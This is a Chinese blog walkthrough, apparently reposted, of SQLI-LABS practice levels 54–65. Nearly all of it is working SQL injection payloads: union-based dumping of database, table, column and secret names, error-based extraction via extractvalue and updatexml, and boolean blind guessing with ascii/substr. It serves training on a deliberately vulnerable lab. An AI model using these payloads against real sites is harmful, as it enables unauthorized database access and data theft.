SQLI-LABS 靶场通过小记(54~65)
Posted 曹振国cc
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQLI-LABS 靶场通过小记(54~65)相关的知识,希望对你有一定的参考价值。
54~65
- :cherry_blossom:完结撒花:cherry_blossom:
- 1~65,堆叠注入和报错注入挺让人头疼的所以我写的比较简单,为了做出这65道题翻阅了有7,8篇博客(因为我比较菜):hugs:,做完这65道题收获还是蛮多的,也更让我深刻的认识到了自身的不足,还是需要继续“好好学习,天天向上”啊:books::pencil2::books::pencil2:!
Less-54:
1.查询数据库
?id=-1' union select 1,database(),3 -- qwe //库:challenges
2.查询表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' -- qwe //表:0HH6JD95U8
3.查询字段
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='0HH6JD95U8' -- qwe //字段:id,sessid,secret_IK8H,tryy
4.查询数据
?id=-1' union select 1,group_concat(secret_IK8H),3 from 0HH6JD95U8 -- qwe //key:5TyUvzJndld9x4XamGn09368
Less-55:
和54题相同,只不过需要括号
)
闭合
?id=-1) union select 1,2,3 -- qwe
Less-56:
与54题相同,只不过需要单引号括号
')
闭合
?id=-1') union select 1,2,3 -- qwe
Less-57:
与54题相同,只不过这道题需要双引号
"
闭合
?id=-1" union select 1,2,3 -- qwe
Less-58:
通过在id后加反斜杠,发现需要单引号
'
闭合,经过测试不能通过union
进行联合查询,但是会产生报错信息,使用报错注入
1.报错注入查询库名
?id=-1' and extractvalue(1, concat(0x5c, (select database()))) -- qwe //库名:challenges
2.查询表名
?id=-1' and updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema='challenges' limit 0,1)),0) -- qwe
//表:46AZEIPRHM 199S5PGWIH
3.查询字段
?id=-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='199S5PGWIH' limit 0,1),0x7e),1) -- qwe
//字段:id,sessid,secret_QGRQ,tryy
4.查询数据
?id=-1' and updatexml(1,concat(0x7e,(select secret_QGRQ from 199S5PGWIH limit 0,1),0x7e),1) -- qwe
//数据:eqF0rqlhQso5Ce2DtnCtJ3JU
Less-59:
与58题相同,不用单引号闭合
/?id=-1 and extractvalue(1, concat(0x5c, (select database()))) -- qwe
Less-60:
与58题相同,只不过需要使用双引号括号
")
闭合
?id=-1") and extractvalue(1, concat(0x5c, (select database()))) -- qwe
Less-61:
与58题相同,这题需要使用单引号括号括号
'))
闭合
?id=-1')) and extractvalue(1, concat(0x5c, (select database()))) -- qwe
Less-62:
使用
')
闭合,在130次内完成盲注
1.判断数据库名的长度
?id=1') and length(database()=10) -- qwe //正常说明是长度是10
2.利用ascii码猜测数据库名
?id=1') and ascii(substr(database(),1,1))=99 -- qwe c
?id=1') and ascii(substr(database(),2,1))=104 -- qwe h
............阿巴阿巴太多了,以此类推吧
Less-63:
与62题相同,使用单引号闭合
?id=1' and ascii(substr(database(),1,1))=99 -- qwe c
Less-64:
与62题相同,使用括号括号
))
闭合
?id=1)) and ascii(substr(database(),1,1))=99 -- qwe
Less-65:
无需闭合
?id=1 and ascii(substr(database(),1,1))=99 -- qwe
🌸完结撒花🌸
1~65,堆叠注入和报错注入挺让人头疼的所以我写的比较简单,为了做出这65道题翻阅了有7,8篇博客(因为我比较菜)🤗,做完这65道题收获还是蛮多的,也更让我深刻的认识到了自身的不足,还是需要继续“好好学习,天天向上”啊📚✏️📚✏️!
以上是关于SQLI-LABS 靶场通过小记(54~65)的主要内容,如果未能解决你的问题,请参考以下文章